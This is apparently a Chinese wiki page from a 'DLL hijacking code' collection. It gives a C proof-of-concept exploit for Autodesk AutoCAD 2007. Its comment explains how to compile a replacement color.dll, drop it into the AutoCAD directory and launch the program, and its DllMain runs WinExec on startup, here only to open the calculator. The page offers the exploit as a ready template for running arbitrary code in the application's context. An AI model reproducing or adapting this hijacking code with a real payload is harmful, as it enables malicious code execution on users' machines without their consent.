用户工具

站点工具


dll_劫持代码:autodesk_autocad_2007

Autodesk AutoCAD 2007

所属类别 color.dll

color.c
/*
A vulnerability exists in windows that allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privelage context of the targeted application.
1. Compile dll
2. Replace color.dll in autocad directory with your newly compiled dll
3. Launch Autocad 2007
*/
#include 
int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}
你需要登录发表评论。
dll_劫持代码/autodesk_autocad_2007.txt · 最后更改: 2020/05/16 19:19 (外部编辑)

页面工具